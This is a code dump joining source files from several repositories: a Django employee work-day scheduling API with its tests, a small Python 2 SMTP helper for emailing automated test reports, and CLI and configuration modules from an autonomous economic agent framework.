from django.db import models
PREFERENCE_CHOICE = (("morning", 0), ("evening", 1))
DAYS_CHOICE = (
("monday", 0),
("tuesday", 1),
("wednesday", 2),
("thursday", 3),
("friday", 4),
("saturday", 5),
("sunday", 6),
)
class Employee(models.Model):
"""Employee model."""
salary = models.IntegerField()
name = models.CharField(max_length=30, unique=True)
preference = models.CharField(choices=PREFERENCE_CHOICE, max_length=20)
off = ArrayField(
models.CharField(choices=DAYS_CHOICE, max_length=30, null=True),
default=list,
blank=True,
)
class DayManager(models.Manager):
"""Manager for Day."""
MAX_MONTHS = 12
def set_month(self, from_now: int) -> Tuple[int, int]:
"""Return the month and the year.
Args:
from_now (int): the number of month from now.
Returns:
tuple: the month and the year.
"""
now = datetime.now()
month = now.month + from_now
month = month % self.MAX_MONTHS or 1
year = now.year + month // self.MAX_MONTHS
return month, year
def get_month(
self, from_now: int = 0, until_last_of_week: bool = True
) -> "DayManager":
"""Get a month."""
month, year = self.set_month(from_now)
monthdays: List[List[date]] = Calendar().monthdatescalendar(year, month)
first_week = monthdays[0]
last_week = monthdays[-1]
start = first_week[0]
if until_last_of_week:
end = last_week[-1]
else:
day_number = monthrange(year, month)[-1]
end = date(year, month, day_number)
return self.filter(date__range=(start, end)).order_by("date")
def create_month(self, from_now: int = 0) -> None:
"""Create a new month."""
month, year = self.set_month(from_now)
monthdays = Calendar().monthdatescalendar(year, month)
days = [day for days in monthdays for day in days]
for day in days:
try:
with transaction.atomic():
self.create(date=day)
except IntegrityError:
print(f"{day} is a duplicate !")
class Day(models.Model):
"""Day model."""
date = models.DateField(unique=True)
employee = models.ManyToManyField(
Employee,
through="WorkDay",
through_fields=("day", "employee"),
)
objects: DayManager = DayManager()
def __str__(self):
"""Define the day."""
return f"{self.date.year}-{self.date.month}-{self.date.day}"
class WorkDay(models.Model):
"""Work Day class."""
employee = models.ForeignKey(Employee, on_delete=models.CASCADE)
day = models.ForeignKey(Day, on_delete=models.CASCADE)
start = models.DateTimeField(default=None)
end = models.DateTimeField(default=None)
```
#### File: apps/worker/urls.py
```python
from django.urls import path, include, register_converter
from rest_framework.routers import DefaultRouter
from . import views
class NegativeIntConverter:
"""URL converter - catch negative integers."""
regex = r"-?\d+"
def to_python(self, value):
"""To python."""
return int(value)
def to_url(self, value):
"""To url."""
return "%d" % value
register_converter(NegativeIntConverter, "negint")
router = DefaultRouter()
router.register("employees", views.EmployeeViewSet)
router.register("workdays", views.WorkDayViewSet)
urlpatterns = [
path("", include(router.urls)),
path("month/<negint:from_now>/", views.get_month, name="get_month"),
path(
"workdays_from_day/<int:day_id>/",
views.get_workday_from_day_id,
name="workdays_from_day",
),
]
```
#### File: apps/worker/views.py
```python
from django.http.response import JsonResponse
from django.http import HttpRequest
from rest_framework import viewsets
from rest_framework.permissions import SAFE_METHODS, BasePermission
from rest_framework.decorators import api_view, permission_classes
from .models import Employee, Day, WorkDay
from .serializers import (
EmployeeSerializerForAdmin,
EmployeeSerializerForUser,
WorkDaySerializer,
)
class IsAdminOrAuthenticatedReadOnly(BasePermission):
"""Is admin or read only for authenticated users."""
def has_permission(self, request: HttpRequest, view):
"""Return bool."""
return (
request.method in SAFE_METHODS
and request.user.is_authenticated
or request.user.is_superuser
)
class EmployeeViewSet(viewsets.ModelViewSet):
"""Employee view set."""
queryset = Employee.objects.all()
permission_classes = [IsAdminOrAuthenticatedReadOnly]
def get_serializer_class(self):
"""Get the good serializer."""
if self.request.user.is_superuser:
return EmployeeSerializerForAdmin
return EmployeeSerializerForUser
@api_view(["GET"])
@permission_classes([IsAdminOrAuthenticatedReadOnly])
def get_month(request, from_now: int):
"""Return a list of days, from a specific month."""
days = []
queryset = Day.objects.get_month(from_now)
for day in queryset:
workdays = day.workday_set.values()
workdays = list(workdays)
workdays = [
{
"id": work["id"],
"day": work["day_id"],
"employee": work["employee_id"],
"start": work["start"],
"end": work["end"],
}
for work in workdays
]
serialized_day = {
"id": day.id,
"year": day.date.year,
"month": day.date.month,
"number": day.date.day,
"works": list(workdays),
}
days.append(serialized_day)
return JsonResponse(days, safe=False)
class WorkDayViewSet(viewsets.ModelViewSet):
"""WorkDay viewset."""
queryset = WorkDay.objects.all()
serializer_class = WorkDaySerializer
permission_classes = [IsAdminOrAuthenticatedReadOnly]
@api_view(["GET"])
@permission_classes([IsAdminOrAuthenticatedReadOnly])
def get_workday_from_day_id(request, day_id: int):
"""Return a list of workdays, from a specific day."""
workdays = []
queryset = WorkDay.objects.filter(day_id=day_id)
for workday in queryset:
serialized_workday = {
"id": workday.id,
"day": workday.day.id,
"employee": workday.employee.id,
"start": workday.start,
"end": workday.end,
}
workdays.append(serialized_workday)
return JsonResponse(workdays, safe=False)
```
#### File: back/tests/test_workday.py
```python
from datetime import datetime
import pytest
from back.apps.worker.management.commands import create_initial_days
from back.apps.worker.models import WorkDay
from back.tests import client, admin, user, employee, get_token
now = datetime.now().isoformat()
@pytest.mark.django_db
def test_work_day_attributes():
"""Test WorkDay attributes."""
assert WorkDay.id # type: ignore
assert WorkDay.day # type: ignore
assert WorkDay.employee # type: ignore
assert WorkDay.start # type: ignore
assert WorkDay.end # type: ignore
@pytest.mark.django_db
def test_retrieve_workday_in_month(client, admin, employee):
"""Find a spectifi workday."""
create_initial_days.Command().handle()
token_header = get_token(client)
response = client.get("/api/work/month/0/", **token_header)
day = response.json()[0]
response = client.post(
"/api/work/workdays/",
{"day": day["id"], "employee": employee.id, "start": now, "end": now},
**token_header,
)
assert response.status_code == 201
response = client.get("/api/work/month/0/", **token_header)
day = response.json()[0]
assert day["works"][0]["employee"] == employee.id
@pytest.mark.django_db
def test_work_day_admin_creation(admin, client, employee):
"""Test the wrok day creation."""
create_initial_days.Command().handle()
token_header = get_token(client)
response = client.get("/api/work/month/0/", **token_header)
day = response.json()[0]
response = client.post(
"/api/work/workdays/",
{"day": day["id"], "employee": employee.id, "start": now, "end": now},
**token_header,
)
assert response.status_code == 201
@pytest.mark.django_db
def test_work_day_not_admin_creation(user, client, employee):
"""Test fail work day creation."""
create_initial_days.Command().handle()
token_header = get_token(client, False)
response = client.get("/api/work/month/0/", **token_header)
day = response.json()[0]
response = client.post(
"/api/work/workdays/",
{"day": day["id"], "employee": employee.id, "start": now, "end": now},
**token_header,
)
assert response.status_code == 403
``` |
{
"source": "8Avalon8/pisces_af",
"score": 3
} |
#### File: pisces_af/utils/mail.py
```python
import smtplib
from email.mime.text import MIMEText
from email.header import Header
def SendEmail(content,title = u"Pisces自动测试异常报告"):
# 第三方 SMTP 服务
subject = title
mailto_list=['<EMAIL>'] #Receiver(List)
mail_host="smtp.163.com" #smtp server address
mail_user="username" #Username
mail_pass="password" #password
mail_postfix="163.com" #邮箱的后缀,网易就是163.com
me="PiscesAutotest"+"<"+mail_user+"@"+mail_postfix+">"
#content =
#print content
msg = MIMEText(content,'plain','utf-8')
msg['Subject'] = Header(subject, 'utf-8')
msg['From'] = Header(me, 'utf-8')
msg['To'] = ";".join(mailto_list) #将收件人列表以‘;’分隔
try:
#print msg
server = smtplib.SMTP()
server.connect(mail_host) #连接服务器
server.login(mail_user,mail_pass) #登录操作
server.sendmail(me, mailto_list, msg.as_string())
server.close()
print u"邮件发送成功"
return True
except Exception, e:
print u"Error: 无法发送邮件"
print str(e)
return False
if __name__ == '__main__':
info = str(1) + "/" + str(3) + " passed"
##########Temp Usage, Should use Result Class to print
mail = u"================================================================\r\n"
mail += info+"\r\n"
mail += u"Fail Tasks:\r\n"
mail += "[Task1,Task2]" + "\r\n"
mail += u"Tasksuits执行完毕\r\n"
mail += u"================================================================\r\n"
SendEmail(mail)
``` |
{
"source": "8ball030/agents-aea",
"score": 2
} |
#### File: aea/cli/add.py
```python
import os
import shutil
import sys
from pathlib import Path
from typing import cast
import click
from click import pass_context
from jsonschema import ValidationError
from aea import AEA_DIR
from aea.cli.common import Context, pass_ctx, logger, _try_to_load_agent_config
from aea.configurations.base import DEFAULT_AEA_CONFIG_FILE, DEFAULT_CONNECTION_CONFIG_FILE, DEFAULT_SKILL_CONFIG_FILE, \
DEFAULT_PROTOCOL_CONFIG_FILE
from aea.cli.registry.utils import fetch_package, split_public_id
@click.group()
@click.option('--registry', is_flag=True, help="For adding from Registry.")
@pass_ctx
def add(ctx: Context, registry):
"""Add a resource to the agent."""
if registry:
ctx.set_config("is_registry", True)
_try_to_load_agent_config(ctx)
def _find_connection_locally(ctx, connection_name):
# check that the provided path points to a proper connection directory -> look for connection.yaml file.
# first check in aea dir
registry_path = ctx.agent_config.registry_path
connection_configuration_filepath = Path(os.path.join(registry_path, "connections", connection_name, DEFAULT_CONNECTION_CONFIG_FILE))
if not connection_configuration_filepath.exists():
# then check in registry
registry_path = AEA_DIR
connection_configuration_filepath = Path(os.path.join(registry_path, "connections", connection_name, DEFAULT_CONNECTION_CONFIG_FILE))
if not connection_configuration_filepath.exists():
logger.error("Cannot find connection: '{}'.".format(connection_name))
sys.exit(1)
# try to load the connection configuration file
try:
connection_configuration = ctx.connection_loader.load(open(str(connection_configuration_filepath)))
logger.info("Connection '{}' supports the following protocols: {}".format(connection_name, connection_configuration.restricted_to_protocols))
except ValidationError as e:
logger.error("Connection configuration file not valid: {}".format(str(e)))
sys.exit(1)
# copy the connection package into the agent's supported connections.
src = str(Path(os.path.join(registry_path, "connections", connection_name)).absolute())
dest = os.path.join(ctx.cwd, "connections", connection_name)
logger.debug("Copying connection modules. src={} dst={}".format(src, dest))
try:
shutil.copytree(src, dest)
except Exception as e:
logger.error(str(e))
sys.exit(1)
@add.command()
@click.argument(
'connection_name', type=str, required=True
)
@pass_context
def connection(click_context, connection_name):
"""Add a connection to the configuration file."""
ctx = cast(Context, click_context.obj)
agent_name = ctx.agent_config.agent_name
is_registry = ctx.config.get("is_registry")
if is_registry:
public_id = str(connection_name)
connection_name = split_public_id(connection_name)[1]
logger.info("Adding connection '{}' to the agent '{}'...".format(connection_name, agent_name))
# check if we already have a connection with the same name
logger.debug("Connections already supported by the agent: {}".format(ctx.agent_config.connections))
if connection_name in ctx.agent_config.connections:
logger.error("A connection with name '{}' already exists. Aborting...".format(connection_name))
sys.exit(1)
# find and add connection
if is_registry:
# fetch from Registry
fetch_package('connection', public_id=public_id, cwd=ctx.cwd)
else:
_find_connection_locally(ctx, connection_name)
# make the 'connections' folder a Python package.
connections_init_module = os.path.join(ctx.cwd, "connections", "__init__.py")
logger.debug("Creating {}".format(connections_init_module))
Path(connections_init_module).touch(exist_ok=True)
# add the connections to the configurations.
logger.debug("Registering the connection into {}".format(DEFAULT_AEA_CONFIG_FILE))
ctx.agent_config.connections.add(connection_name)
ctx.agent_loader.dump(ctx.agent_config, open(os.path.join(ctx.cwd, DEFAULT_AEA_CONFIG_FILE), "w"))
def _find_protocol_locally(ctx, protocol_name):
# check that the provided path points to a proper protocol directory -> look for protocol.yaml file.
# first check in aea dir
registry_path = ctx.agent_config.registry_path
protocol_configuration_filepath = Path(os.path.join(registry_path, "protocols", protocol_name, DEFAULT_PROTOCOL_CONFIG_FILE))
if not protocol_configuration_filepath.exists():
# then check in registry
registry_path = AEA_DIR
protocol_configuration_filepath = Path(os.path.join(registry_path, "protocols", protocol_name, DEFAULT_PROTOCOL_CONFIG_FILE))
if not protocol_configuration_filepath.exists():
logger.error("Cannot find protocol: '{}'.".format(protocol_name))
sys.exit(1)
# try to load the protocol configuration file
try:
protocol_configuration = ctx.protocol_loader.load(open(str(protocol_configuration_filepath)))
logger.debug("Protocol available: {}".format(protocol_configuration.name))
except ValidationError as e:
logger.error("Protocol configuration file not valid: {}".format(str(e)))
sys.exit(1)
# copy the protocol package into the agent's supported connections.
src = str(Path(os.path.join(registry_path, "protocols", protocol_name)).absolute())
dest = os.path.join(ctx.cwd, "protocols", protocol_name)
logger.debug("Copying protocol modules. src={} dst={}".format(src, dest))
try:
shutil.copytree(src, dest)
except Exception as e:
logger.error(str(e))
sys.exit(1)
@add.command()
@click.argument(
'protocol_name', type=str, required=True
)
@pass_context
def protocol(click_context, protocol_name):
"""Add a protocol to the agent."""
ctx = cast(Context, click_context.obj)
agent_name = cast(str, ctx.agent_config.agent_name)
is_registry = ctx.config.get("is_registry")
if is_registry:
public_id = str(protocol_name)
protocol_name = split_public_id(protocol_name)[1]
logger.info("Adding protocol '{}' to the agent '{}'...".format(protocol_name, agent_name))
# check if we already have a protocol with the same name
logger.debug("Protocols already supported by the agent: {}".format(ctx.agent_config.protocols))
if protocol_name in ctx.agent_config.protocols:
logger.error("A protocol with name '{}' already exists. Aborting...".format(protocol_name))
sys.exit(1)
# find and add protocol
if is_registry:
# fetch from Registry
fetch_package('protocol', public_id=public_id, cwd=ctx.cwd)
else:
_find_protocol_locally(ctx, protocol_name)
# make the 'protocols' folder a Python package.
logger.debug("Creating {}".format(os.path.join(agent_name, "protocols", "__init__.py")))
Path(os.path.join(ctx.cwd, "protocols", "__init__.py")).touch(exist_ok=True)
# add the protocol to the configurations.
logger.debug("Registering the protocol into {}".format(DEFAULT_AEA_CONFIG_FILE))
ctx.agent_config.protocols.add(protocol_name)
ctx.agent_loader.dump(ctx.agent_config, open(os.path.join(ctx.cwd, DEFAULT_AEA_CONFIG_FILE), "w"))
def _find_skill_locally(ctx, skill_name, click_context):
# check that the provided path points to a proper skill directory -> look for skill.yaml file.
# first check in aea dir
registry_path = ctx.agent_config.registry_path
skill_configuration_filepath = Path(os.path.join(registry_path, "skills", skill_name, DEFAULT_SKILL_CONFIG_FILE))
if not skill_configuration_filepath.exists():
# then check in registry
registry_path = AEA_DIR
skill_configuration_filepath = Path(os.path.join(registry_path, "skills", skill_name, DEFAULT_SKILL_CONFIG_FILE))
if not skill_configuration_filepath.exists():
logger.error("Cannot find skill: '{}'.".format(skill_name))
sys.exit(1)
# try to load the skill configuration file
try:
skill_configuration = ctx.skill_loader.load(open(str(skill_configuration_filepath)))
except ValidationError as e:
logger.error("Skill configuration file not valid: {}".format(str(e)))
sys.exit(1)
# copy the skill package into the agent's supported skills.
src = str(Path(os.path.join(registry_path, "skills", skill_name)).absolute())
dest = os.path.join(ctx.cwd, "skills", skill_name)
logger.debug("Copying skill modules. src={} dst={}".format(src, dest))
try:
shutil.copytree(src, dest)
except Exception as e:
logger.error(str(e))
sys.exit(1)
# check for not supported protocol, and add it.
for protocol_name in skill_configuration.protocols:
if protocol_name not in ctx.agent_config.protocols:
logger.debug("Adding protocol '{}' to the agent...".format(protocol_name))
click_context.invoke(protocol, protocol_name=protocol_name)
@add.command()
@click.argument('skill_name', type=str, required=True)
@pass_context
def skill(click_context, skill_name):
"""Add a skill to the agent."""
ctx = cast(Context, click_context.obj)
agent_name = ctx.agent_config.agent_name
is_registry = ctx.config.get("is_registry")
if is_registry:
public_id = str(skill_name)
skill_name = split_public_id(skill_name)[1]
logger.info("Adding skill '{}' to the agent '{}'...".format(skill_name, agent_name))
# check if we already have a skill with the same name
logger.debug("Skills already supported by the agent: {}".format(ctx.agent_config.skills))
if skill_name in ctx.agent_config.skills:
logger.error("A skill with name '{}' already exists. Aborting...".format(skill_name))
sys.exit(1)
# find and add protocol
if is_registry:
# fetch from Registry
fetch_package('skill', public_id=public_id, cwd=ctx.cwd)
else:
_find_skill_locally(ctx, skill_name, click_context)
# make the 'skills' folder a Python package.
skills_init_module = os.path.join(ctx.cwd, "skills", "__init__.py")
logger.debug("Creating {}".format(skills_init_module))
Path(skills_init_module).touch(exist_ok=True)
# add the skill to the configurations.
logger.debug("Registering the skill into {}".format(DEFAULT_AEA_CONFIG_FILE))
ctx.agent_config.skills.add(skill_name)
ctx.agent_loader.dump(ctx.agent_config, open(os.path.join(ctx.cwd, DEFAULT_AEA_CONFIG_FILE), "w"))
```
#### File: aea/cli/core.py
```python
import os
import shutil
import sys
from pathlib import Path
from typing import cast
import click
from click import pass_context
from jsonschema import ValidationError
import aea
from aea.cli.add import add
from aea.cli.add import connection, skill
from aea.cli.common import Context, pass_ctx, logger, _try_to_load_agent_config, DEFAULT_REGISTRY_PATH
from aea.cli.install import install
from aea.cli.list import list as _list
from aea.cli.loggers import simple_verbosity_option
from aea.cli.remove import remove
from aea.cli.run import run
from aea.cli.scaffold import scaffold
from aea.cli.search import search
from aea.configurations.base import DEFAULT_AEA_CONFIG_FILE, AgentConfig, PrivateKeyPathConfig
from aea.crypto.default import DefaultCrypto
from aea.crypto.ethereum import EthereumCrypto
from aea.crypto.fetchai import FetchAICrypto
from aea.crypto.helpers import DEFAULT_PRIVATE_KEY_FILE, FETCHAI_PRIVATE_KEY_FILE, ETHEREUM_PRIVATE_KEY_FILE, \
_validate_private_key_path
DEFAULT_CONNECTION = "oef"
DEFAULT_SKILL = "error"
@click.group(name="aea")
@click.version_option(aea.__version__, prog_name="aea")
@simple_verbosity_option(logger, default="INFO")
@click.pass_context
def cli(ctx) -> None:
"""Command-line tool for setting up an Autonomous Economic Agent."""
ctx.obj = Context(cwd=".")
@cli.command()
@click.argument('agent_name', type=str, required=True)
@pass_context
def create(click_context, agent_name):
"""Create an agent."""
ctx = cast(Context, click_context.obj)
path = Path(agent_name)
logger.info("Initializing AEA project '{}'".format(agent_name))
logger.info("Creating project directory '/{}'".format(agent_name))
# create the agent's directory
try:
path.mkdir(exist_ok=False)
# create a config file inside it
logger.info("Creating config file {}".format(DEFAULT_AEA_CONFIG_FILE))
config_file = open(os.path.join(agent_name, DEFAULT_AEA_CONFIG_FILE), "w")
agent_config = AgentConfig(agent_name=agent_name, aea_version=aea.__version__, authors="", version="v1", license="", url="", registry_path=DEFAULT_REGISTRY_PATH, description="")
agent_config.default_connection = DEFAULT_CONNECTION
ctx.agent_loader.dump(agent_config, config_file)
# next commands must be done from the agent's directory -> overwrite ctx.cwd
ctx.agent_config = agent_config
ctx.cwd = agent_config.agent_name
logger.info("Default connections:")
click_context.invoke(connection, connection_name=DEFAULT_CONNECTION)
logger.info("Default skills:")
click_context.invoke(skill, skill_name=DEFAULT_SKILL)
except OSError:
logger.error("Directory already exist. Aborting...")
sys.exit(1)
except ValidationError as e:
logger.error(str(e))
shutil.rmtree(agent_name, ignore_errors=True)
sys.exit(1)
except Exception as e:
logger.exception(e)
shutil.rmtree(agent_name, ignore_errors=True)
sys.exit(1)
@cli.command()
@click.argument('agent_name', type=click.Path(exists=True, file_okay=False, dir_okay=True), required=True)
@pass_ctx
def delete(ctx: Context, agent_name):
"""Delete an agent."""
path = Path(agent_name)
# check that the target folder is an AEA project.
cwd = os.getcwd()
try:
os.chdir(agent_name)
fp = open(DEFAULT_AEA_CONFIG_FILE, mode="r", encoding="utf-8")
ctx.agent_config = ctx.agent_loader.load(fp)
_try_to_load_agent_config(ctx)
except Exception:
logger.error("The name provided is not an AEA project.")
sys.exit(1)
finally:
os.chdir(cwd)
logger.info("Deleting agent project directory '/{}'...".format(path))
# delete the agent's directory
try:
shutil.rmtree(path, ignore_errors=False)
except OSError:
logger.error("An error occurred while deleting the agent directory. Aborting...")
sys.exit(1)
@cli.command()
@pass_ctx
def freeze(ctx: Context):
"""Get the dependencies."""
_try_to_load_agent_config(ctx)
for d in ctx.get_dependencies():
print(d)
@cli.command()
@pass_ctx
@click.option('-p', '--port', default=8080)
def gui(ctx: Context, port):
"""Run the CLI GUI."""
import aea.cli_gui # pragma: no cover
logger.info("Running the GUI.....(press Ctrl+C to exit)") # pragma: no cover
aea.cli_gui.run(port) # pragma: no cover
@cli.command()
@click.argument("type_", metavar="TYPE", type=click.Choice([
DefaultCrypto.identifier,
FetchAICrypto.identifier,
EthereumCrypto.identifier,
"all"]), required=True)
@pass_ctx
def generate_key(ctx: Context, type_):
"""Generate private keys."""
if type_ == DefaultCrypto.identifier or type_ == "all":
DefaultCrypto().dump(open(DEFAULT_PRIVATE_KEY_FILE, "wb"))
if type_ == FetchAICrypto.identifier or type_ == "all":
FetchAICrypto().dump(open(FETCHAI_PRIVATE_KEY_FILE, "wb"))
if type_ == EthereumCrypto.identifier or type_ == "all":
EthereumCrypto().dump(open(ETHEREUM_PRIVATE_KEY_FILE, "wb"))
@cli.command()
@click.argument("type_", metavar="TYPE", type=click.Choice([
DefaultCrypto.identifier,
FetchAICrypto.identifier,
EthereumCrypto.identifier
]), required=True)
@click.argument("file", metavar="FILE", type=click.Path(exists=True, file_okay=True, dir_okay=False, readable=True),
required=True)
@pass_ctx
def add_key(ctx: Context, type_, file):
"""Add a private key to the wallet."""
_try_to_load_agent_config(ctx)
_validate_private_key_path(file, type_)
try:
ctx.agent_config.private_key_paths.create(type_, PrivateKeyPathConfig(type_, file))
except ValueError as e: # pragma: no cover
logger.error(str(e)) # pragma: no cover
ctx.agent_loader.dump(ctx.agent_config, open(os.path.join(ctx.cwd, DEFAULT_AEA_CONFIG_FILE), "w"))
cli.add_command(add)
cli.add_command(_list)
cli.add_command(search)
cli.add_command(scaffold)
cli.add_command(remove)
cli.add_command(install)
cli.add_command(run)
```
#### File: aea/cli/list.py
```python
import os
import click
from aea.cli.common import Context, pass_ctx, _try_to_load_agent_config, retrieve_details, format_items
from aea.configurations.base import DEFAULT_CONNECTION_CONFIG_FILE, DEFAULT_SKILL_CONFIG_FILE, \
DEFAULT_PROTOCOL_CONFIG_FILE
@click.group()
@pass_ctx
def list(ctx: Context):
"""List the installed resources."""
_try_to_load_agent_config(ctx)
@list.command()
@pass_ctx
def connections(ctx: Context):
"""List all the installed connections."""
result = []
for connection_id in sorted(ctx.agent_config.connections):
connection_configuration_filepath = os.path.join("connections", connection_id, DEFAULT_CONNECTION_CONFIG_FILE)
details = retrieve_details(connection_id, ctx.connection_loader, connection_configuration_filepath)
result.append(details)
print(format_items(sorted(result, key=lambda k: k['name'])))
@list.command()
@pass_ctx
def protocols(ctx: Context):
"""List all the installed protocols."""
result = []
for protocol_id in sorted(ctx.agent_config.protocols):
protocol_configuration_filepath = os.path.join("protocols", protocol_id, DEFAULT_PROTOCOL_CONFIG_FILE)
details = retrieve_details(protocol_id, ctx.protocol_loader, protocol_configuration_filepath)
result.append(details)
print(format_items(sorted(result, key=lambda k: k['name'])))
@list.command()
@pass_ctx
def skills(ctx: Context):
"""List all the installed skills."""
result = []
for skill_id in sorted(ctx.agent_config.skills):
skill_configuration_filepath = os.path.join("skills", skill_id, DEFAULT_SKILL_CONFIG_FILE)
details = retrieve_details(skill_id, ctx.skill_loader, skill_configuration_filepath)
result.append(details)
print(format_items(sorted(result, key=lambda k: k['name'])))
```
#### File: aea/configurations/base.py
```python
from abc import ABC, abstractmethod
from typing import TypeVar, Generic, Optional, List, Tuple, Dict, Set, cast
DEFAULT_AEA_CONFIG_FILE = "aea-config.yaml"
DEFAULT_SKILL_CONFIG_FILE = "skill.yaml"
DEFAULT_CONNECTION_CONFIG_FILE = 'connection.yaml'
DEFAULT_PROTOCOL_CONFIG_FILE = 'protocol.yaml'
DEFAULT_PRIVATE_KEY_PATHS = {"default": "", "fetchai": "", "ethereum": ""}
T = TypeVar('T')
Address = str
ProtocolId = str
SkillId = str
class JSONSerializable(ABC):
"""Interface for JSON-serializable objects."""
@property
@abstractmethod
def json(self) -> Dict:
"""Compute the JSON representation."""
@classmethod
def from_json(cls, obj: Dict):
"""Build from a JSON object."""
class Configuration(JSONSerializable, ABC):
"""Configuration class."""
class CRUDCollection(Generic[T]):
"""Interface of a CRUD collection."""
def __init__(self):
"""Instantiate a CRUD collection."""
self._items_by_id = {} # type: Dict[str, T]
def create(self, item_id: str, item: T) -> None:
"""
Add an item.
:param item_id: the item id.
:param item: the item to be added.
:return: None
:raises ValueError: if the item with the same id is already in the collection.
"""
if item_id in self._items_by_id:
raise ValueError("Item with name {} already present!".format(item_id))
else:
self._items_by_id[item_id] = item
def read(self, item_id: str) -> Optional[T]:
"""
Get an item by its name.
:param item_id: the item id.
:return: the associated item, or None if the item id is not present.
"""
return self._items_by_id.get(item_id, None)
def update(self, item_id: str, item: T) -> None:
"""
Update an existing item.
:param item_id: the item id.
:param item: the item to be added.
:return: None
"""
self._items_by_id[item_id] = item
def delete(self, item_id: str) -> None:
"""Delete an item."""
if item_id in self._items_by_id.keys():
del self._items_by_id[item_id]
def read_all(self) -> List[Tuple[str, T]]:
"""Read all the items."""
return [(k, v) for k, v in self._items_by_id.items()]
class PrivateKeyPathConfig(Configuration):
"""Handle a private key path configuration."""
def __init__(self, ledger: str = "", path: str = ""):
"""Initialize a handler configuration."""
self.ledger = ledger
self.path = path
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"ledger": self.ledger,
"path": self.path
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
ledger = cast(str, obj.get("ledger"))
path = cast(str, obj.get("path"))
return PrivateKeyPathConfig(
ledger=ledger,
path=path
)
class LedgerAPIConfig(Configuration):
"""Handle a ledger api configuration."""
def __init__(self, ledger: str = "", addr: str = "", port: int = 1000):
"""Initialize a handler configuration."""
self.ledger = ledger
self.addr = addr
self.port = port
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"ledger": self.ledger,
"addr": self.addr,
"port": self.port
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
ledger = cast(str, obj.get("ledger"))
addr = cast(str, obj.get("addr"))
port = cast(int, obj.get("port"))
return LedgerAPIConfig(
ledger=ledger,
addr=addr,
port=port
)
class ConnectionConfig(Configuration):
"""Handle connection configuration."""
def __init__(self,
name: str = "",
authors: str = "",
version: str = "",
license: str = "",
url: str = "",
class_name: str = "",
restricted_to_protocols: Optional[Set[str]] = None,
dependencies: Optional[List[str]] = None,
description: str = "",
**config):
"""Initialize a connection configuration object."""
self.name = name
self.authors = authors
self.version = version
self.license = license
self.url = url
self.class_name = class_name
self.restricted_to_protocols = restricted_to_protocols if restricted_to_protocols is not None else set()
self.dependencies = dependencies if dependencies is not None else []
self.description = description
self.config = config
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"name": self.name,
"authors": self.authors,
"version": self.version,
"license": self.license,
"url": self.url,
"class_name": self.class_name,
"restricted_to_protocols": self.restricted_to_protocols,
"dependencies": self.dependencies,
"description": self.description,
"config": self.config
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
restricted_to_protocols = obj.get("restricted_to_protocols")
restricted_to_protocols = restricted_to_protocols if restricted_to_protocols is not None else set()
dependencies = cast(List[str], obj.get("dependencies", []))
return ConnectionConfig(
name=cast(str, obj.get("name")),
authors=cast(str, obj.get("authors")),
version=cast(str, obj.get("version")),
license=cast(str, obj.get("license")),
url=cast(str, obj.get("url")),
class_name=cast(str, obj.get("class_name")),
restricted_to_protocols=cast(Set[str], restricted_to_protocols),
dependencies=dependencies,
description=cast(str, obj.get("description")),
**cast(dict, obj.get("config"))
)
class ProtocolConfig(Configuration):
"""Handle protocol configuration."""
def __init__(self,
name: str = "",
authors: str = "",
version: str = "",
license: str = "",
url: str = "",
dependencies: Optional[List[str]] = None,
description: str = ""):
"""Initialize a connection configuration object."""
self.name = name
self.authors = authors
self.version = version
self.license = license
self.url = url
self.dependencies = dependencies
self.description = description
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"name": self.name,
"authors": self.authors,
"version": self.version,
"license": self.license,
"url": self.url,
"dependencies": self.dependencies,
"description": self.description
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
dependencies = cast(List[str], obj.get("dependencies", []))
return ProtocolConfig(
name=cast(str, obj.get("name")),
authors=cast(str, obj.get("authors")),
version=cast(str, obj.get("version")),
license=cast(str, obj.get("license")),
url=cast(str, obj.get("url")),
dependencies=dependencies,
description=cast(str, obj.get("description")),
)
class HandlerConfig(Configuration):
"""Handle a skill handler configuration."""
def __init__(self, class_name: str = "", **args):
"""Initialize a handler configuration."""
self.class_name = class_name
self.args = args
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"class_name": self.class_name,
"args": self.args
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
class_name = cast(str, obj.get("class_name"))
return HandlerConfig(
class_name=class_name,
**obj.get("args", {})
)
class BehaviourConfig(Configuration):
"""Handle a skill behaviour configuration."""
def __init__(self, class_name: str = "", **args):
"""Initialize a behaviour configuration."""
self.class_name = class_name
self.args = args
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"class_name": self.class_name,
"args": self.args
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
class_name = cast(str, obj.get("class_name"))
return BehaviourConfig(
class_name=class_name,
**obj.get("args", {})
)
class TaskConfig(Configuration):
"""Handle a skill task configuration."""
def __init__(self, class_name: str = "", **args):
"""Initialize a task configuration."""
self.class_name = class_name
self.args = args
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"class_name": self.class_name,
"args": self.args
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
class_name = cast(str, obj.get("class_name"))
return TaskConfig(
class_name=class_name,
**obj.get("args", {})
)
class SharedClassConfig(Configuration):
"""Handle a skill shared class configuration."""
def __init__(self, class_name: str = "", **args):
"""Initialize a shared class configuration."""
self.class_name = class_name
self.args = args
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"class_name": self.class_name,
"args": self.args
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
class_name = cast(str, obj.get("class_name"))
return SharedClassConfig(
class_name=class_name,
**obj.get("args", {})
)
class SkillConfig(Configuration):
"""Class to represent a skill configuration file."""
def __init__(self,
name: str = "",
authors: str = "",
version: str = "",
license: str = "",
url: str = "",
protocols: List[str] = None,
dependencies: Optional[List[str]] = None,
description: str = ""):
"""Initialize a skill configuration."""
self.name = name
self.authors = authors
self.version = version
self.license = license
self.url = url
self.protocols = protocols if protocols is not None else [] # type: List[str]
self.dependencies = dependencies
self.description = description
self.handlers = CRUDCollection[HandlerConfig]()
